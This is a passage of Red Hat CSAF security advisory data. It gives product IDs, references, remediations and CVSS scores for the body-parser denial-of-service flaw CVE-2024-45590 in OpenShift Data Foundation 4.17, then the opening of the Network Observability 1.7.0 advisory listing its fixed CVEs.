"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45590"
},
{
"category": "external",
"summary": "RHBZ#2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce",
"url": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7",
"url": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7"
}
],
"release_date": "2024-09-10T16:15:21.083000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "body-parser: Denial of Service Vulnerability in body-parser"
}
]
}
rhsa-2024_8014
Vulnerability from csaf_redhat
Published
2024-10-22 01:05
Modified
2024-11-08 07:57
Summary
Red Hat Security Advisory: Network Observability 1.7.0 for OpenShift
Notes
Topic
Network Observability 1.7 for Red Hat OpenShift
Red Hat Product Security has rated this update as having a security impact of
Important. A Common Vulnerability Scoring System (CVSS) base score, which gives
a detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Network Observability 1.7.0
Security Fix(es):
* Network Observability: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* Network Observability: XSS vulnerability via prototype pollution (CVE-2024-45801)
* Network Observability: axios: Server-Side Request Forgery (CVE-2024-39338)
* Network Observability: Denial of Service Vulnerability in body-parser (CVE-2024-45590)
* Network Observability: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* Network Observability: Backtracking regular expressions cause ReDoS (CVE-2024-45296)
* Network Observability: Improper Input Handling in Express Redirects (CVE-2024-43796)
* Network Observability: Improper Sanitization in serve-static (CVE-2024-43800)
* Network Observability: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)
* Network Observability: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion (CVE-2024-34155)
* Network Observability: Calling Parse on a "// +build" build tag line with deeply nested expressions can cause a panic due to stack exhaustion (CVE-2024-34158)
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
